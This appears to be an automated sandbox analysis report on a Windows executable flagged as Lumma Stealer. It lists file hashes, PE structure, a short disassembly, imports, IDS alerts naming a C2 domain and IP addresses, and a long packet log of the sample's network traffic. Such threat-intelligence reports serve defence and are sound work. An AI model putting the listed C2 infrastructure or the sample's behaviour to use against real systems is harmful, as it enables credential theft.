TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sqJIHyPqhr.exe
File size:	437'248 bytes
MD5:	fc0ff134aa4c7a6c02f3d502eb17a1d4
SHA1:	c8a08842839e36ddc3811f3c3f78951dda942c43
SHA256:	ede8801434d59328105f4af419b459a3c5d6c60195cbe8c718bbc529607ddc61
SHA512:	a7f7c5029802621c81edfd409e444c6854c7d819ca598fd87ce3821ef6cbb601c9c0183677c4a2c2b47184cd0759ed336012fc679a63ffd93ff4349332542419
SSDEEP:	6144:aYW0yoiMGGmHV8+tlYjanM1TGQoe9WSdsdkus85X0A6C9+gXKTwduftyc:aYcMGGLIlpM1TkSUk3CGI5Kwsftyc
TLSH:	DE94E01165F2A535F7F38A357935EA945A7BB873AE31818E2758131F0E30392CE22717
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.A;#..;#..;#...lK.:#..%qY.%#..%qH./#..%q^.U#......>#..;#..O#..%qW.:#..%qI.:#..%qL.:#..Rich;#..........PE..L.....7e...........

File Icon


Icon Hash:	46c7c30b0f4e0d59

Static PE Info

General

Entrypoint:	0x401877
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6537EA89 [Tue Oct 24 16:02:17 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	607342d0c32277611749326750554d8e

Entrypoint Preview

Instruction
call 00007F61487ED16Bh
jmp 00007F61487E97EDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00456C38h], eax
mov dword ptr [00456C34h], ecx
mov dword ptr [00456C30h], edx
mov dword ptr [00456C2Ch], ebx
mov dword ptr [00456C28h], esi
mov dword ptr [00456C24h], edi
mov word ptr [00456C50h], ss
mov word ptr [00456C44h], cs
mov word ptr [00456C20h], ds
mov word ptr [00456C1Ch], es
mov word ptr [00456C18h], fs
mov word ptr [00456C14h], gs
pushfd
pop dword ptr [00456C48h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00456C3Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00456C40h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00456C4Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00456B88h], 00010001h
mov eax, dword ptr [00456C40h]
mov dword ptr [00456B3Ch], eax
mov dword ptr [00456B30h], C0000409h
mov dword ptr [00456B34h], 00000001h
mov eax, dword ptr [00454004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00454008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5290c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x431000	0x112f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x52470	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x51000	0x194	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4fe5c	0x50000	8551e924f9b8a4a2c69914d8eb8820b9	False	0.8433258056640625	data	7.542034715807606	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x51000	0x2218	0x2400	1e73e104059fece98feab08a81957bb7	False	0.3492838541666667	data	5.38413002657157	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x54000	0x3dc4bc	0x7000	65ed3e9a53a6bfb811c4fba65d95f4fd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x431000	0x112f0	0x11400	8228ffabb01be6b6a2293ca26b58bc68	False	0.5862488677536232	data	5.785337253574913	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4315e0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.5101279317697228
RT_ICON	0x432488	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.5658844765342961
RT_ICON	0x432d30	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.6002304147465438
RT_ICON	0x4333f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.6394508670520231
RT_ICON	0x433960	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.4099585062240664
RT_ICON	0x435f08	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.4793621013133208
RT_ICON	0x436fb0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.47704918032786886
RT_ICON	0x437938	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.5806737588652482
RT_ICON	0x437e18	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.8121002132196162
RT_ICON	0x438cc0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.8438628158844765
RT_ICON	0x439568	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.826036866359447
RT_ICON	0x439c30	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.7947976878612717
RT_ICON	0x43a198	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.8044605809128631
RT_ICON	0x43c740	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.8334896810506567
RT_ICON	0x43d7e8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.8426229508196721
RT_ICON	0x43e170	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.8563829787234043
RT_STRING	0x43e808	0x386	data			0.4567627494456763
RT_STRING	0x43eb90	0xb2	data			0.601123595505618
RT_STRING	0x43ec48	0x6d0	data			0.4288990825688073
RT_STRING	0x43f318	0x71e	data			0.4313940724478595
RT_STRING	0x43fa38	0x6e2	data			0.43473325766174803
RT_STRING	0x440120	0x65c	data			0.43611793611793614
RT_STRING	0x440780	0x71a	data			0.4251925192519252
RT_STRING	0x440ea0	0x7c8	data			0.41967871485943775
RT_STRING	0x441668	0x756	data			0.4222577209797657
RT_STRING	0x441dc0	0x52e	data			0.4517345399698341
RT_GROUP_ICON	0x43e5d8	0x76	data	Turkmen	Turkmenistan	0.6694915254237288
RT_GROUP_ICON	0x437da0	0x76	data	Turkmen	Turkmenistan	0.6610169491525424
RT_VERSION	0x43e650	0x1b4	data			0.5688073394495413

Imports

DLL

Import

KERNEL32.dll

SearchPathW, SetLocaleInfoA, SetErrorMode, InterlockedIncrement, InterlockedDecrement, SetDefaultCommConfigW, ReadConsoleOutputAttribute, GetEnvironmentStringsW, GetTimeFormatA, SetEvent, GetModuleHandleW, GetDateFormatA, GetCommandLineA, SetProcessPriorityBoost, LoadLibraryW, DeleteVolumeMountPointW, GetConsoleAliasW, GetFileAttributesW, GetStartupInfoA, SetLastError, GetProcAddress, BuildCommDCBW, GetNumaHighestNodeNumber, GetAtomNameA, LoadLibraryA, Process32Next, LocalAlloc, GetFileType, AddAtomW, AddAtomA, FoldStringA, CreatePipe, GetModuleHandleA, OpenFileMappingW, GetShortPathNameW, FindFirstVolumeA, EndUpdateResourceA, GetVersionExA, UnregisterWaitEx, SetFileAttributesW, GetLastError, HeapFree, HeapAlloc, MultiByteToWideChar, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA

USER32.dll

GetProcessDefaultLayout

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkmen	Turkmenistan

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T20:55:39.186687+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49710	172.67.179.207	443	TCP
2024-12-18T20:55:40.836777+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.12	49711	176.113.115.19	80	TCP
2024-12-18T20:55:44.631941+0100	2058374	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)	1	192.168.2.12	51216	1.1.1.1	53	UDP
2024-12-18T20:55:46.337579+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.12	49712	172.67.220.223	443	TCP
2024-12-18T20:55:46.337579+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49712	172.67.220.223	443	TCP
2024-12-18T20:55:47.533720+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.12	49712	172.67.220.223	443	TCP
2024-12-18T20:55:47.533720+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.12	49712	172.67.220.223	443	TCP
2024-12-18T20:55:48.594984+0100	2058375	ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)	1	192.168.2.12	49715	172.67.220.223	443	TCP
2024-12-18T20:55:48.594984+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.12	49715	172.67.220.223	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 20:55:36.925923109 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:36.925966978 CET	443	49710	172.67.179.207	192.168.2.12
Dec 18, 2024 20:55:36.926070929 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:36.940078974 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:36.940099955 CET	443	49710	172.67.179.207	192.168.2.12
Dec 18, 2024 20:55:38.166654110 CET	443	49710	172.67.179.207	192.168.2.12
Dec 18, 2024 20:55:38.166731119 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:38.641436100 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:38.641479969 CET	443	49710	172.67.179.207	192.168.2.12
Dec 18, 2024 20:55:38.641920090 CET	443	49710	172.67.179.207	192.168.2.12
Dec 18, 2024 20:55:38.641984940 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:38.645852089 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:38.687345982 CET	443	49710	172.67.179.207	192.168.2.12
Dec 18, 2024 20:55:39.186707020 CET	443	49710	172.67.179.207	192.168.2.12
Dec 18, 2024 20:55:39.186839104 CET	443	49710	172.67.179.207	192.168.2.12
Dec 18, 2024 20:55:39.186866045 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:39.186898947 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:39.188776016 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:39.188806057 CET	443	49710	172.67.179.207	192.168.2.12
Dec 18, 2024 20:55:39.188818932 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:39.188853979 CET	49710	443	192.168.2.12	172.67.179.207
Dec 18, 2024 20:55:39.302161932 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:39.422943115 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:39.423039913 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:39.423887014 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:39.543675900 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.836658955 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.836776972 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:40.836782932 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.836796999 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.836841106 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:40.837544918 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.837553978 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.837605000 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:40.838329077 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.838336945 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.838404894 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:40.839132071 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.839138985 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.839144945 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.839196920 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:40.956451893 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.956597090 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:40.956810951 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.956985950 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:40.960701942 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:40.960792065 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.028614044 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.028693914 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.028748035 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.028820992 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.032772064 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.032830954 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.033035040 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.033122063 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.041452885 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.041522980 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.042186975 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.042260885 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.049618006 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.049686909 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.050142050 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.050215006 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.058541059 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.058548927 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.058644056 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.067065954 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.067152977 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.067388058 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.067445040 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.075050116 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.075125933 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.075455904 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.075547934 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.084688902 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.084696054 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.084762096 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.091871023 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.091947079 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.092035055 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.092091084 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.100439072 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.100534916 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.101483107 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.101531982 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.108556032 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.108563900 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.108633995 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.108664989 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.148873091 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.148891926 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.149125099 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.220474005 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.220545053 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.220783949 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.220849991 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.222933054 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.222981930 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.223041058 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.223083973 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.226583004 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.226640940 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.226830959 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.226883888 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.231472015 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.231479883 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.231535912 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.236752987 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.236812115 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.237477064 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.237519979 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.241480112 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.241487980 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.241616011 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.245840073 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.245847940 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.245898008 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.251013994 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.251024961 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.251066923 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.251096964 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.255348921 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.255356073 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.255405903 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.259881020 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.259953976 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.260106087 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.260157108 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.264467001 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.264525890 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.265203953 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.265254974 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.269253016 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.269262075 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.269313097 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.273653030 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.273694038 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.273832083 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.273919106 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.278498888 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.278553963 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.278711081 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.278759003 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.282063961 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.282160044 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.282397985 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.282453060 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.286098003 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.286118031 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.286173105 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.289732933 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.289792061 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.289959908 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.290040970 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.293370008 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.293442011 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.293667078 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.293723106 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.296734095 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.296816111 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.296843052 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.296916962 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.300328970 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.300379038 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.300518036 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.300592899 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.303978920 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.304064989 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.304348946 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.304395914 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.307600975 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.307646990 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.307981968 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.308048964 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.311238050 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.311283112 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.311621904 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.311676025 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.340497017 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.340560913 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.340667963 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.340739965 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.412784100 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.412806988 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.412863016 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.414010048 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.414073944 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.414189100 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.414244890 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.417048931 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.417057037 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.417117119 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.420238018 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.420303106 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.420650959 CET	80	49711	176.113.115.19	192.168.2.12
Dec 18, 2024 20:55:41.420702934 CET	49711	80	192.168.2.12	176.113.115.19
Dec 18, 2024 20:55:41.423304081 CET	80	49711	176.113.115.19	192.168.2.12
